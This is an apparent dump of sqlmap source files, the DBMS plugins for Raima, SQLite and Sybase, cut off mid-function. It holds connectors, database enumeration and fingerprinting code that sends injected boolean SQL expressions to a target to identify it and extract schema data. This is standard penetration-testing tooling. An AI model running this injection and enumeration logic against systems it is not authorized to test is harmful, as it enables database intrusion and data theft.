    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHAR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/raima/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Raima Database Manager it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Raima Database Manager it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Raima Database Manager it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Raima Database Manager it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sqlite/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import SQLITE_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.sqlite.enumeration import Enumeration\nfrom plugins.dbms.sqlite.filesystem import Filesystem\nfrom plugins.dbms.sqlite.fingerprint import Fingerprint\nfrom plugins.dbms.sqlite.syntax import Syntax\nfrom plugins.dbms.sqlite.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass SQLiteMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines SQLite methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = SQLITE_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.SQLITE] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sqlite/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import sqlite3\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.convert import getText\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapMissingDependence\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite\n    User guide: http://docs.python.org/release/2.5/lib/module-sqlite3.html\n    API: http://docs.python.org/library/sqlite3.html\n    Debian package: python-sqlite (SQLite 2), python-pysqlite3 (SQLite 3)\n    License: MIT\n\n    Possible connectors: http://wiki.python.org/moin/SQLite\n    \"\"\"\n\n    def __init__(self):\n        GenericConnector.__init__(self)\n        self.__sqlite = sqlite3\n\n    def connect(self):\n        self.initConnection()\n        self.checkFileDb()\n\n        try:\n            self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout)\n\n            cursor = self.connector.cursor()\n            cursor.execute(\"SELECT * FROM sqlite_master\")\n            cursor.close()\n\n        except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError):\n            warnMsg = \"unable to connect using SQLite 3 library, trying with SQLite 2\"\n            logger.warning(warnMsg)\n\n            try:\n                try:\n                    import sqlite\n                except ImportError:\n                    errMsg = \"sqlmap requires 'python-sqlite' third-party library \"\n                    errMsg += \"in order to directly connect to the database '%s'\" % self.db\n                    raise SqlmapMissingDependence(errMsg)\n\n                self.__sqlite = sqlite\n                self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout)\n            except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError) as ex:\n                raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except self.__sqlite.OperationalError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(getText(query))\n        except self.__sqlite.OperationalError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n        except self.__sqlite.DatabaseError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sqlite/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getCurrentUser(self):\n        warnMsg = \"on SQLite it is not possible to enumerate the current user\"\n        logger.warning(warnMsg)\n\n    def getCurrentDb(self):\n        warnMsg = \"on SQLite it is not possible to get name of the current database\"\n        logger.warning(warnMsg)\n\n    def isDba(self, user=None):\n        warnMsg = \"on SQLite the current user has all privileges\"\n        logger.warning(warnMsg)\n\n        return True\n\n    def getUsers(self):\n        warnMsg = \"on SQLite it is not possible to enumerate the users\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPasswordHashes(self):\n        warnMsg = \"on SQLite it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on SQLite it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getDbs(self):\n        warnMsg = \"on SQLite it is not possible to enumerate databases (use only '--tables')\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchDb(self):\n        warnMsg = \"on SQLite it is not possible to search databases\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchColumn(self):\n        errMsg = \"on SQLite it is not possible to search columns\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def getHostname(self):\n        warnMsg = \"on SQLite it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on SQLite it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sqlite/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on SQLite it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on SQLite it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sqlite/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.core.settings import SQLITE_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.SQLITE)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.SQLITE\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        \"\"\"\n        References for fingerprint:\n\n        * http://www.sqlite.org/lang_corefunc.html\n        * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions\n        \"\"\"\n\n        if not conf.extensiveFp and Backend.isDbmsWithin(SQLITE_ALIASES):\n            setDbms(DBMS.SQLITE)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.SQLITE\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"LAST_INSERT_ROWID()=LAST_INSERT_ROWID()\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.SQLITE\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"SQLITE_VERSION()=SQLITE_VERSION()\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.SQLITE\n                logger.warning(warnMsg)\n\n                return False\n            else:\n                infoMsg = \"actively fingerprinting %s\" % DBMS.SQLITE\n                logger.info(infoMsg)\n\n                result = inject.checkBooleanExpression(\"RANDOMBLOB(-1)>0\")\n                version = '3' if result else '2'\n                Backend.setVersion(version)\n\n            setDbms(DBMS.SQLITE)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.SQLITE\n            logger.warning(warnMsg)\n\n            return False\n\n    def forceDbmsEnum(self):\n        conf.db = \"%s%s\" % (DBMS.SQLITE, METADB_SUFFIX)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sqlite/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHAR(97,98,99,100,101,102,103,104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"CHAR(%s)\" % ','.join(\"%d\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sqlite/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on SQLite it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on SQLite it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on SQLite it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on SQLite it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sybase/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import SYBASE_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.sybase.enumeration import Enumeration\nfrom plugins.dbms.sybase.filesystem import Filesystem\nfrom plugins.dbms.sybase.fingerprint import Fingerprint\nfrom plugins.dbms.sybase.syntax import Syntax\nfrom plugins.dbms.sybase.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass SybaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Sybase methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = SYBASE_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.SYBASE] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sybase/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import _mssql\n    import pymssql\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.convert import getText\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: http://pymssql.sourceforge.net/\n    User guide: http://pymssql.sourceforge.net/examples_pymssql.php\n    API: http://pymssql.sourceforge.net/ref_pymssql.php\n    Debian package: python-pymssql\n    License: LGPL\n\n    Possible connectors: http://wiki.python.org/moin/SQL%20Server\n\n    Important note: pymssql library on your system MUST be version 1.0.2\n    to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = pymssql.connect(host=\"%s:%d\" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)\n        except (pymssql.Error, _mssql.MssqlDatabaseException) as ex:\n            raise SqlmapConnectionException(ex)\n        except ValueError:\n            raise SqlmapConnectionException\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except (pymssql.Error, _mssql.MssqlDatabaseException) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex).replace(\"\\n\", \" \"))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(getText(query))\n            retVal = True\n        except (pymssql.OperationalError, pymssql.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex).replace(\"\\n\", \" \"))\n        except pymssql.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        if self.execute(query):\n            retVal = self.fetchall()\n\n            try:\n                self.connector.commit()\n            except pymssql.OperationalError:\n                pass\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sybase/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import filterPairValues\nfrom lib.core.common import isListLike\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import readInput\nfrom lib.core.common import safeSQLIdentificatorNaming\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.data import queries\nfrom lib.core.dicts import SYBASE_TYPES\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import CURRENT_DB\nfrom lib.utils.brute import columnExists\nfrom lib.utils.pivotdumptable import pivotDumpTable\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\nfrom thirdparty import six\nfrom thirdparty.six.moves import zip as _zip\n\nclass Enumeration(GenericEnumeration):\n    def getUsers(self):\n        infoMsg = \"fetching database users\"\n        logger.info(infoMsg)\n\n        rootQuery = queries[DBMS.SYBASE].users\n\n        query = rootQuery.inband.query\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            blinds = (False, True)\n        else:\n            blinds = (True,)\n\n        for blind in blinds:\n            retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)\n\n            if retVal:\n                kb.data.cachedUsers = list(retVal[0].values())[0]\n                break\n\n        return kb.data.cachedUsers\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Sybase it is not possible to fetch \"\n        warnMsg += \"database users privileges, sqlmap will check whether \"\n        warnMsg += \"or not the database users are database administrators\"\n        logger.warning(warnMsg)\n\n        users = []\n        areAdmins = set()\n\n        if conf.user:\n            users = [conf.user]\n        elif not len(kb.data.cachedUsers):\n            users = self.getUsers()\n        else:\n            users = kb.data.cachedUsers\n\n        for user in users:\n            user = unArrayizeValue(user)\n\n            if user is None:\n                continue\n\n            isDba = self.isDba(user)\n\n            if isDba is True:\n                areAdmins.add(user)\n\n            kb.data.cachedUsersPrivileges[user] = None\n\n        return (kb.data.cachedUsersPrivileges, areAdmins)\n\n    def getDbs(self):\n        if len(kb.data.cachedDbs) > 0:\n            return kb.data.cachedDbs\n\n        infoMsg = \"fetching database names\"\n        logger.info(infoMsg)\n\n        rootQuery = queries[DBMS.SYBASE].dbs\n        query = rootQuery.inband.query\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            blinds = [False, True]\n        else:\n            blinds = [True]\n\n        for blind in blinds:\n            retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)\n\n            if retVal:\n                kb.data.cachedDbs = next(six.itervalues(retVal[0]))\n                break\n\n        if kb.data.cachedDbs:\n            kb.data.cachedDbs.sort()\n\n        return kb.data.cachedDbs\n\n    def getTables(self, bruteForce=None):\n        if len(kb.data.cachedTables) > 0:\n            return kb.data.cachedTables\n\n        self.forceDbmsEnum()\n\n        if conf.db == CURRENT_DB:\n            conf.db = self.getCurrentDb()\n\n        if conf.db:\n            dbs = conf.db.split(',')\n        else:\n            dbs = self.getDbs()\n\n        for db in dbs:\n            dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)\n\n        dbs = [_ for _ in dbs if _]\n\n        infoMsg = \"fetching tables for database\"\n        infoMsg += \"%s: %s\" % (\"s\" if len(dbs) > 1 else \"\", \", \".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs)))\n        logger.info(infoMsg)\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            blinds = [False, True]\n        else:\n            blinds = [True]\n\n        rootQuery = queries[DBMS.SYBASE].tables\n\n        for db in dbs:\n            for blind in blinds:\n                query = rootQuery.inband.query % db\n                retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)\n\n                if retVal:\n                    for table in next(six.itervalues(retVal[0])):\n                        if db not in kb.data.cachedTables:\n                            kb.data.cachedTables[db] = [table]\n                        else:\n                            kb.data.cachedTables[db].append(table)\n                    break\n\n        for db, tables in kb.data.cachedTables.items():\n            kb.data.cachedTables[db] = sorted(tables) if tables else tables\n\n        return kb.data.cachedTables\n\n    def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False):\n        self.forceDbmsEnum()\n\n        if conf.db is None or conf.db == CURRENT_DB:\n            if conf.db is None:\n                warnMsg = \"missing database parameter. sqlmap is going \"\n                warnMsg += \"to use the current database to enumerate \"\n                warnMsg += \"table(s) columns\"\n                logger.warning(warnMsg)\n\n            conf.db = self.getCurrentDb()\n\n        elif conf.db is not None:\n            if ',' in conf.db:\n                errMsg = \"only one database name is allowed when enumerating \"\n                errMsg += \"the tables' columns\"\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n\n        conf.db = safeSQLIdentificatorNaming(conf.db)\n\n        if conf.col:\n            colList = conf.col.split(',')\n        else:\n            colList = []\n\n        if conf.exclude:\n            colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]\n\n        for col in colList:\n            colList[colList.index(col)] = safeSQLIdentificatorNaming(col)\n\n        if conf.tbl:\n            tblList = conf.tbl.split(',')\n        else:\n            self.getTables()\n\n            if len(kb.data.cachedTables) > 0:\n                tblList = list(six.itervalues(kb.data.cachedTables))\n\n                if tblList and isListLike(tblList[0]):\n                    tblList = tblList[0]\n            else:\n                errMsg = \"unable to retrieve the tables \"\n                errMsg += \"on database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                raise SqlmapNoneDataException(errMsg)\n\n        for tbl in tblList:\n            tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)\n\n        if bruteForce:\n            resumeAvailable = False\n\n            for tbl in tblList:\n                for db, table, colName, colType in kb.brute.columns:\n                    if db == conf.db and table == tbl:\n                        resumeAvailable = True\n                        break\n\n            if resumeAvailable and not conf.freshQueries or colList:\n                columns = {}\n\n                for column in colList:\n                    columns[column] = None\n\n                for tbl in tblList:\n                    for db, table, colName, colType in kb.brute.columns:\n                        if db == conf.db and table == tbl:\n                            columns[colName] = colType\n\n                    if conf.db in kb.data.cachedColumns:\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns\n                    else:\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns}\n\n                return kb.data.cachedColumns\n\n            message = \"do you want to use common column existence check? [y/N/q] \"\n            choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()\n\n            if choice == 'N':\n                return\n            elif choice == 'Q':\n                raise SqlmapUserQuitException\n            else:\n                return columnExists(paths.COMMON_COLUMNS)\n\n        rootQuery = queries[DBMS.SYBASE].columns\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            blinds = [False, True]\n        else:\n            blinds = [True]\n\n        for tbl in tblList:\n            if conf.db is not None and len(kb.data.cachedColumns) > 0 \\\n               and conf.db in kb.data.cachedColumns and tbl in \\\n               kb.data.cachedColumns[conf.db]:\n                infoMsg = \"fetched tables' columns on \"\n                infoMsg += \"database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                logger.info(infoMsg)\n\n                return {conf.db: kb.data.cachedColumns[conf.db]}\n\n            if dumpMode and colList:\n                table = {}\n                table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList)\n                kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table\n                continue\n\n            infoMsg = \"fetching columns \"\n            infoMsg += \"for table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n            infoMsg += \"on database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n            logger.info(infoMsg)\n\n            for blind in blinds:\n                query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))\n                retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.usertype' % kb.aliasName], blind=blind, alias=kb.aliasName)\n\n                if retVal:\n                    table = {}\n                    columns = {}\n\n                    for name, type_ in filterPairValues(_zip(retVal[0][\"%s.name\" % kb.aliasName], retVal[0][\"%s.usertype\" % kb.aliasName])):\n                        columns[name] = SYBASE_TYPES.get(int(type_) if hasattr(type_, \"isdigit\") and type_.isdigit() else type_, type_)\n\n                    table[safeSQLIdentificatorNaming(tbl, True)] = columns\n                    kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table\n\n                    break\n\n        return kb.data.cachedColumns\n\n    def searchDb(self):\n        warnMsg = \"on Sybase searching of databases is not implemented\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchTable(self):\n        warnMsg = \"on Sybase searching of tables is not implemented\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchColumn(self):\n        warnMsg = \"on Sybase searching of columns is not implemented\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def search(self):\n        warnMsg = \"on Sybase search option is not available\"\n        logger.warning(warnMsg)\n\n    def getHostname(self):\n        warnMsg = \"on Sybase it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on Sybase it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sybase/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on Sybase it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on Sybase it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sybase/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import OS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import SYBASE_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.SYBASE)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.SYBASE\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(SYBASE_ALIASES):\n            setDbms(\"%s %s\" % (DBMS.SYBASE, Backend.getVersion()))\n\n            self.getBanner()\n\n            Backend.setOs(OS.WINDOWS)\n\n            